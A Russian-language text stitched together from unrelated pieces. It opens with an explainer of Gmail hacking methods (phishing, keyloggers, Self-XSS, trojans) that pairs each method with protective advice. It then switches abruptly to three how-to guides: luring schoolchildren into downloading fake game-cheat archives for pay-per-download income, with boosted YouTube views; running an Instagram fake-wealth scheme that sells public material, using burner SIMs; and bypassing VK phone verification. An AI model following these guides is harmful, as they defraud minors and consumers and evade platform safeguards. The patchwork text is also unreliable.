Пример: хакер – программист, обладающий некоторыми знаниями в веб-технологиях (хакер «Gmail» в нашем случае). Он создает страницу входа в систему, которая выглядит как страница входа в «Gmail» со сценарием «PHP» в фоновом режиме, что помогает хакеру получать имя пользователя и пароль, введенные на фишинговой странице. Программист поместил эту поддельную страницу в URL-адрес: https://www.gmauil.com/money-making-tricks.html. И рассылает сообщения для привлечения пользователей к своей странице. Обязательно все сообщения имеют привлекательный вид и заманивают пользователей, обещая разные выгоды. В нашем случае хакер предлагает ссылку на страницу, объясняющую легкий способ заработка в сети Интернет. Перейдя по ссылке, пользователь увидит страницу входа в «Gmail» и введет свои имя пользователя и пароль. Теперь регистрационная информация пользователя будет отправлена хакеру (фоновый «php» выполнит этот процесс отправки незаметно для пользователя), а пользователь-жертва будет перенаправлен на страницу, посвященную заработку, https://www.gmauil.com/money-making-tricks.html. Процесс взлома учетной записи пользователя завершен.

Как защитить себя от фишинга «Gmail»?

Хакеры могут связаться с вами разными способами, например, по электронной почте «Gmail», личным сообщением, сообщением в социальной сети, объявлением на сайте и т.д. Нажав на какие-либо ссылки из таких сообщений, вы можете попасть на страницу входа в «Gmail». Всякий раз, когда вы видите перед собой страницу входа в «Gmail» или «Google», обязательно проверьте URL-адрес такой страницы. Потому что никто не сможет использовать оригинальный URL-адрес «Google» для создания фишинговой страницы, кроме случаев, когда есть уязвимости XSS нулевого дня, но это бывает очень редко.

1. Какой URL-адрес вы видите в адресной строке браузера?
2. Это действительно https://mail.google.com/ или https://www.gmail.com/(косая черта важна, поскольку она является единственным разделителем в браузере «Google Chrome», чтобы отличать домен и дополнительный домен)?
3. Есть ли зеленый символ безопасности(HTTPS) или зеленый замочек, указанный в адресной строке?

Ответы на эти вопросы значительно увеличат ваши шансы вовремя распознать фишинговую страницу и сохранить вашу конфиденциальную информацию в безопасности. Ниже приведены примеры фишинговых страниц.

Вариант фишинговой страницы с высоким уровнем достоверности.

Большинство людей не заподозрят такую страницу (снимок, указанный выше), так как присутствует префикс «https» с замочком безопасности зеленого цвета, и нет ошибок в написании страницы «accounts.google.com». Но это фишинговая страница. Обратите внимание на URL-адрес. Это «https://accounts.google.com.beck.com», поэтому «accounts.google.com»является субдоменом «beck.com». «Google Chrome» не отличает поддомен и домен в отличие от «Firefox».

«SSL-сертификаты» (HTTPS) могут быть получены от многих поставщиков, некоторые из которых могут предоставить «сертификат SSL» бесплатно на срок до одного года. Не так уж и сложно создать подобную фишиноговую страницу, поэтому остерегайтесь таких подделок.

Это обычная фишинговая страница с некоторой модификацией слова «Google».

2. Социальная инженерия

Это второй по популярности метод взлома учетных записей «Gmail». На самом деле этот метод не должен подпадать под определение хакерства. Но мы решили указать его здесь, чтобы представить самый полный список наиболее распространенных методов, используемых для взлома учетной записи «Gmail» в соответствующем порядке. Социальная инженерия – это в основном процесс сбора информации о пользователе, чей аккаунт вам нужно взломать. Такая информация, как дата рождения, номер мобильного телефона, номер мобильного телефона друга или подруги, прозвище, имя матери, место рождения и т.д. помогут хакеру взломать учетную запись «Gmail».

Как работает Социальная инженерия?

Контрольный вопрос

Многие веб-сайты применяют единый механизм сброса пароля, называемый вопросом безопасности или контрольным вопросом. Самыми распространенными вопросами безопасности будут такие: «Каков ваш ник?», «Место, где вы родились?», «Назовите ваш любимый город?». Или любые индивидуальные вопросы, заданные самим пользователем. Получение такой информации от соответствующих людей может позволить взломать их учетную запись. «Gmail»также использует вопросы безопасности как вариант восстановления пароля. Поэтому, если кто-нибудь узнает ответ на такие вопросы, он может взломать вашу учетную запись, используя опцию восстановления пароля.

Наиболее распространенные и слабые пароли

Вопрос безопасности не позволяет легко входить в учетную запись «Gmail». Но использование для входа в учетную запись слабых паролей может легко позволить любому взломать ваш аккаунт. Что такое слабый пароль? Пароль, который может быть легко угадан или подобран третьим лицом, называется слабым паролем. Ниже приведены некоторые из наиболее распространенных паролей, которые люди обычно используют в «Gmail».

• Номер мобильного телефона
• Логин или имя и дата рождения
• Номер мобильного телефона друга или подруги (наиболее часто встречается)
• Имя друга или подруги (также часто встречающийся вариант)
• Комбинация собственного имени пользователя и имени друга или подруги
• Номер автомобиля
• Неиспользуемый или старый номер мобильного телефона
• Прозвище домашнего питомца
• Имя близкого родственника (матери, отца, сестры, брата)
• Общеизвестные простые пароли (123456,654321, 111111, password)

Обязательно проверьте свой пароль на соответствие вышеуказанным вариантам. В случае совпадений, измените свой пароль на более сложный. Этот простой способ поможет вам избежать взлома учетной записи и потери своих конфиденциальных данных в будущем.

Как защитить себя от социальной инженерии?

Контрольный вопрос

Во-первых, выбирайте такой контрольный вопрос, чтобы ответ на него был известен только вам. Никому не сообщайте выбранный вариант вопроса и ответ на него. Во-вторых, в настройках учетной записи пользователя задайте дополнительные адрес электронной почты и номер мобильного телефона, чтобы «Google» мог быстро уведомить вас в случае несанкционированного доступа к вашей учетной записи.

3. Простой захват пароля

Это еще один распространенный метод, часто используемый для кражи пароля пользователя в «Gmail». Многие люди не знают об этом методе, но традиционные хакеры используют этот метод для взлома учетных записей пользователей.

Как работает простой захват пароля?

В этом методе хакер (злоумышленник) нацелен на какой-либо сайт, обладающий низким уровнем защиты от взлома, где пользователь-жертва зарегистрирован. Хакер взламывает базу данных такого сайта и получает сохраненные имя пользователя и пароль жертвы. Но как хакер может получить доступ к «Gmail»? Многие из нас часто используют один и тот же пароль для «Gmail» и разных других сайтов, не обладающих достаточно сильной защитой от взлома. Поэтому взломав слабозащищенный сайт, хакер может получить пользовательские данные для доступа в «Gmail».

Иногда хакер создает новый веб-сайт с целью получения базы имен пользователей и паролей потенциальных жертв. Всякий раз, когда пользователь регистрируется на таком сайте, его электронная почта и пароль, будут храниться в базе данных сайта. Таким образом, хакер получает доступ к вашей регистрационной информации. Поэтому, если пользователь использует одни и те же адрес электронной почты и пароль для регистрации на «Gmail» и других сайтах, то шанс получить взломанную учетную запись «Gmail» существенно возрастает.

Как защитить себя от простого захвата пароля?

Вы никогда не должны доверять сторонним сайтам низкого качества. Даже популярные веб-сайты, такие как «LinkedIn», могут быть взломаны. Большинство сайтов хранят пароли пользователей в простой базе данных, даже не думая о ее шифровании или дополнительной защите. Это облегчает работу хакеров, нацеленных на взлом сайтов, поскольку пароль хранится в виде обычного текста. Лучший способ защиты от такого метода – иметь уникальный пароль, по крайней мере, для сайтов, которым вы действительно доверяете. Не используйте свой пароль «Gmail» для любого другого веб-сайта, и тогда ваш пароль никогда не будет раскрыт.

4. KeyLogger

Keylogger – это программный инструмент, используемый для записи нажатий клавиш на компьютере. Он, в свою очередь, записывает все данные, которые вы вводите, используя клавиатуру, и сохраняет их для дальнейшего использования.

Как работает Keylogger?

Все кейлогеры запускаются в фоновом режиме (кроме пробных версий) и не будут доступны для просмотра пользователю, пока он не узнает пароль кейлоггера и ярлык, используемые для его просмотра. Он будет записывать все нажатия клавиш и сохранит подробный отчет о том, когда и какие пароли использовались для какого приложения. Любой, кто прочитает журналы кейлоггеров, может увидеть пароль «Gmail» или любые введенные пароли и другую конфиденциальную информацию, например данные кредитной карты, пароль авторизации банковской учетной записи и т.д. Всякий раз, когда вы входите в систему на общедоступном компьютере, есть вероятность, что ваш пароль может быть взломан.

Ваш знакомый может попросить вас войти в систему, используя его компьютер. И если на нем установлен кейлоггер, то, скорее всего, ваша учетная запись будет взломана.

Как вы можете защитить себя от кейлоггера?

Вы должны опасаться кейлоггеров, особенно, когда вы используете любой общедоступный компьютер или компьютер вашего друга. Одним из способов защиты является использование «экранной клавиатуры», когда вам нужно ввести пароль. Обязательно убедитесь, что никто не видит ваш экран во время ввода пароля, так как на экране будет видно все, что вы набрали.

Вы можете открыть «Экранную клавиатуру» с помощью диалогового окна «Выполнить». Нажмите сочетание клавиш «Windows + R», в диалоговом окне введите команду «osk» и нажмите клавишу «ОК». В настоящее время «Экранную клавиатуру» также поддерживают многие банковские порталы, что дает вам дополнительную защиту. Поэтому, пожалуйста, всегда используйте ее, при просмотре страниц в интернете на общедоступных компьютерах, чтобы сохранить свою конфиденциальную информацию в секрете.

5. Расширение браузера для взлома «Gmail»

Этот метод не позволяет злоумышленнику получить полный доступ к вашей учетной записи «Gmail», но дает возможность контролировать вашу учетную запись опосредованно. Мы сталкивались с несколькими расширениями «Google Chrome» и «Firefox», которые тайно выполняют разнообразные действия, такие как размещение сообщений в «Google +», добавление отметки «+1» и т.д.

Как работает расширение браузера, взламывающее «Gmail»?

Когда вы посещаете некоторые вредоносные веб-сайты или веб-страницы, вам будет предложено установить расширение браузера. В случае его установки расширение выполнит все задачи, описанные хакером, который его создал. Расширение может обновлять ваш статус, публиковать различные сообщения, приглашать друзей, вступать в различные круги и т.д. Вы можете даже не узнать об этом, если вы долго не заглядывали в свою учетную запись «Google».

Как предотвратить такой взлом?

Вы можете отслеживать все свои действия, записи и комментарии в своей учетной записи «Gmail» с помощью функции «Журнал активности». Вы не должны доверять посторонним веб-сайтам, которые предлагают вам добавить расширение браузера. Устанавливайте расширения только в том случае, если вы доверяете разработчику. Вы не должны рисковать своей информацией, если сомневаетесь в свойствах предлагаемого расширения, и всегда старайтесь избегать их установки.

6. Уязвимости браузера

Уязвимости браузера – это ошибки безопасности, которые существуют в более старых версиях мобильных и стационарных браузеров.

Как работают уязвимости браузера?

Большинство уязвимостей браузера доступны только в старых версиях браузера, поскольку все найденные ошибки и уязвимости исправляются разработчиком браузера при каждом его следующем обновлении. Например, уязвимость браузера с одинаковой исходной политикой может позволить злоумышленнику прочитать ответ любой страницы, например «Gmail». И сможет выполнить любые действия в вашей учетной записи «Gmail», поскольку злоумышленник может прочитать ответ, обратившись к источнику «Google.com».

Как защитить себя от уязвимостей браузера?

Старайтесь использовать последние версии браузера и операционной системы и регулярно обновляйте их. Избегайте работать в старой версии браузера, чтобы уменьшить риск хакерского взлома вашей учетной записи.

7. Уязвимость Self XSS

«XSS» – это в основном уязвимость веб-безопасности, которая позволяет хакерам внедрять вредоносные скрипты в веб-страницы, используемые другими пользователями. «Self XSS» (Self Cross Site Scripting) – это своего рода атака социальной инженерии, где жертва случайно выполняет сценарий, тем самым помогая хакеру.

Как работает «Self XSS»?

В этом методе хакер обещает помочь вам взломать чужую учетную запись «Gmail». Но вместо того, чтобы предоставить вам доступ к чужой учетной записи, хакер запускает вредоносный «Javascript» в консоли вашего браузера, что дает ему возможность манипулировать вашей учетной записью.

Как защитить себя от XSS?

«Self XSS» – это метод хакерского взлома вашей учетной записи с использованием вредоносного кода. Никогда не копируйте и не вставляйте в браузер неизвестный код, указанный вам кем-либо. В противном случае ваша учетная запись «Gmail» будет взломана.

8. Троян

«Троян» (троянский конь) – это вредоносная программа, которая используется для шпионажа и управления компьютером, вводя в заблуждение пользователей о ее истинном намерении. Вредоносная программа троян также может называться «удаленным кейлоггером», поскольку она записывает ваши ключевые действия на компьютере в различных приложениях и отправляет их хакеру.

Как работает троян?

Программное обеспечение, которое вы считаете чистым, может быть трояном и может попасть к вам разными способами: PDF-файл, загруженный вами, любой видео файл, полученный из подозрительных источников и т.д. Все они могут содержать троян. Троян работает в фоновом режиме, собирает необходимую информацию и отправляет ее хакеру. Троян может быть отправлен в любой форме на любой носитель: флэш-накопитель, «ipod», веб-сайт или электронная почта. В нашем случае троян запишет пароль «Gmail», который вы набрали в своем браузере, и отправит его хакеру через сеть интернет.

Как защитить себя от трояна?

• Не устанавливайте программы из неизвестного источника
• Не воспроизводите медиа файлы, полученные из ненадежного источника
• Не открывайте файлы, загруженные с сомнительных источников
• Не используйте чужие флэш-накопители в своем компьютере
• Обновите антивирусное программное обеспечение, установленное на вашем компьютере

Наличие обновленного антивирусного программного обеспечения не гарантирует вам стопроцентной безопасности от взлома. Любое антивирусное программное обеспечение представляет собой набор обнаруженных вредоносных программ и вирусов. Его задача – сравнить каждый файл с базой данных вирусов и заблокировать или удалить найденные совпадения. Иногда этого бывает недостаточно, так как существуют некоторые программы, которые позволяют создавать скрытые трояны. Но они практически никогда не используются для взлома аккаунта обычного пользователя. Поэтому наличие обновленной антивирусной программы защитит вашу учетную запись от трояна.

9. «Gmail Zero Day»

«Zero Day» – это уязвимость системы безопасности, которая неизвестна соответствующему разработчику программного обеспечения. В нашем случае уязвимость системы безопасности связана с «Gmail» и называется «Gmail Zero Day».

Как работает уязвимость «Gmail Zero Day»?

Уязвимости «Gmail Zero Day» встречаются очень редко. Это в основном лазейки в защите отдельных узлов системы, о которых не знает «Google». Но компания «Google» использует бонусную программу «Google Bug Bounty» для поиска таких ошибок и их устранения.

Есть два типа людей, которые обнаруживают уязвимость нулевого дня. Первый – это специалисты по компьютерной безопасности и энтузиасты-исследователи ошибок со всего мира, которые тестируют продукты «Google» (в нашем случае «Gmail») и сообщают о найденных уязвимостях безопасности в соответствующую службу для их исправления.

Второй – это хакеры (так называемые «Blackhat»), которые обнаруживают уязвимость нулевом дня, но не раскрывают ее, а используют для своей личной выгоды.

Как защититься от «Gmail Zero Day»?

Как мы уже говорили ранее, уязвимости нулевого дня очень редки и в основном они нацелены только на влиятельных людей и знаменитостей. Для атаки на учетные записи обычных пользователей они практически не применяются.

По этому крайне не рекомендую! самому скачивать и запускать файлы, которые вы загружаете на файлообменник.

А вот на наивных американских школьниках можно и срубить кэша.

И так приступим:

Во-первых я вас познакомлю с сайтом pinapfile.

Регистрируемся на файлообменнике https://pinapfile.com -

(яндекс может писать, что этот сайт не безопасный. Он полностью безопасен!!! С вашим компьютером ничего не случится, это нормальная практика для сайтов-файлообменников.)

Для более нормального заработка нам понадобится зарубежный трафик. Т.к данный сайт платит в среднем за одно уникальной скачивание из США около 1.2$. Ниже на скриншоте цены указаны

более подробно:

1.Регистрируемся на данном сайте. тык

Для этого нажимаем на Sign up. И далее пишем свою почту и имя. И нажимаем Sign Up for Free.

После данных действий, вам на почту придет сообщение с подтверждением. В котором будет находится пароль от аккаунта.

ВАЖНО: Ha [@Mail.ru НЕ ПРИДЕТ,ИСПОЛЬЗУЙТЕ @Gmail.com] (ЕСЛИ ПИСЬМО НЕ ПРИХОДИТ ПРОВЕРЬТЕ В СПАМЕ!).

Поздравляю вы зарегистрировались!

Теперь переходим к следующему этапу:

2. Заходим на аккаунт и переходим в вкладку Files (Файлы).Здесь мы будем добавлять любой фаил (желательно архив. Переименовываем свой архив) например Private Hack v3.5).

Вот ФАЙЛ можете переделать его под себя,и под свою игру. (Называем файл так, потому что мы будем заливать видео на youtube с читами для популярных игр и с нашей ссылкой. Youtube это бесплатный зарубежный траффик, а читы на игры всегда популярны в поисковых запросах.

Далее поговорим об этом подробней.)

После данных действия появляется файл:

Нажимаем на синюю кнопку. И копируем ссылку на файл.

Советую данную ссылку сократить, есть множество сайтов для сокращения ссылок ( например https://bitly.com )

Итак файл мы залили, теперь будем распространять.

3.Распространение файла на youtube.

Нам понадобится аккаунт google с youtube каналом. Его можно купить или зарегистрировать самому. А у большинства он есть.

Фаил будем распространять как чит на популярные игры такие как - PUBG,ROBLOX,UNTURNED.(игры можно подбирать самому,даже нужно,т.к. чем больше видео с "читами" залить с различными играми - профита будет больше)

Заходим на youtube и вводим в поиске PUBG hack

Ищем видео, где будет демонстрация читов.

Скачиваем любое из данных видео (можно воспользоваться сайтом https://ru.savefrom.net)

4.Теперь заливаем данное видео на свой youtube канал.

Название можно взять с видео, которое скачали и описание. И не забудьте в описании добавить ссылку на свой фаил.

Можете воспользоваться сервисом по скачиванию превью с видео - https://alexbruni.ru/youtube2images/

И всё ждем просмотров и скачиваний.

ВАЖНО - что бы профит был в первые 3 дня,советую взять накрутку на видео.

(например1-2к просмотров и 50+ лайков) или другие способы распространения зависит от вашей фантазии, всё это позволит вывести ваши видео в топ по поиску.

Специально для хороших людей,один мой хороший знакомый сливает для вас "АВТОКЛИКЕР" для YTmonster.ru -АВТОКЛИКЕР(яндекс диск) АВТОКЛИКЕР(rghost)(сервис по накрутке просмотров,лайков,подписчиков на ютубе)

Как работает кликер,запускаете кликер,заходите на

-сайт

- Выполнить задание

- запускаете кликер

-выбираете каждые координаты

- в кликере выбираете "Время ожидания в задании" - 30 сек

-жмет старт,курим сиги,пьем чай, пока работает кликер и фармит вам баланс

Пробуйте разные игры CS PUBG DOTA2 и т.д Советую заливать видео вечером или ночью. Т.к в Америке другой часовой пояс. И конечно же пруфы

Мы будем зарабатывать на людях, которые хотят заработать (Собственно, как всегда)

Заработок идет с помощью соц. сети Instagram

Мы создаем себе профиль богатого человечка, раскручиваем аккаунт, делаем мульты с ссылками на мейн профиль и продаем доступ в закрытый телеграмм канал с (вы не поверите) паблик схемами заработка, которые каждый может найти, если захочет.

По сути схема действительно белая, потому что есть реальный продукт за который человек платит деньги и подкопаться с юридической стороны, практически невозможно. Но я все равно рекомендую использовать левую симку и левые почты, дабы не засорять ваше личное информационное поле.

Какие ресурсы используются для раскрутки:

SMMPLANNER - для стабильного выхода постов

INSTAROBOT - и вот та самая программа, за которую ты по сути платишь 35к в премиум пакете. Функционал посмотрите сами.

Ну и еще куча мультов с ссылкой на основной профиль, если нужно тоже их приложу.

Расходы:

Собственно, кроме расходов на саму схему - их не так много.

- Левая симка (желательно купленная физически, чтобы иметь возможность принимать звонки)

Можно использовать и основную симку в принципе.

- Ну и реклама в инсте, сколько денег тратить на рекламу? Да сколько хотите. Можно и 500 рублей и 5000+

Как происходит сделка:

• - Человек, увидевший наш профиль в каком то рекламном посте, обращается к нам в директ или по другим контактам.
• - Общаетесь с ним от имени администратора канала, потому что ваше основное лицо человек очень занятой.
• - Лично я делал доступ в телеграмм канал пожизненным, некоторые делают месячные тарифы, тут уже как вам хочется.
• - Человек скидывает вам денежку, желательно иметь максимально возможно широкий диапазон приема платежей, начиная от вебмани и заканчивая приемом на номер телефона оператора.
• - Вы даете ему доступ к каналу и раз в неделю заливаете туда какую нибудь паблик схему
• - Готово, вы миллионер.

Где брать фотографии богатых людей? Ищите там же в инстаграме, только из-за бугра. Ну или посидите на нашем канале пару месяцев, и сфоткайте себя.

Отправляем приглашение на почту (vk.com/invite). После приглашения, страница создается сразу.

Далее нужно восстановить пароль от приглашенной страницы, через почту, т.к после приглашения страница создается, но пароль от нее мы не знаем.

После изменения пароля заходим на страницу и смотрим. Если вас закинуло на страницу указания пола, возраста и привязке к телефону – это хорошо. Вы можете попытаться открыть что-то, через адресную строку, но вас будет перекидывать на привязку к телефону.

Заходим на страницу по API. В меню слева заходим в настройки (1). Далее нажимаем "Аккаунт" (2). В графе "Настройка страницы" нажимаем на "Сохранить" (3).

Готово. Теперь можно заходить на страницу VK, и вас не будет редиректить на страницу привязки телефона.

Данный способ немного убогий, потому что в некоторых случаях нужно обязательно привязывать номер (например, после создания группы, и дальнейшем переводе её в страницу).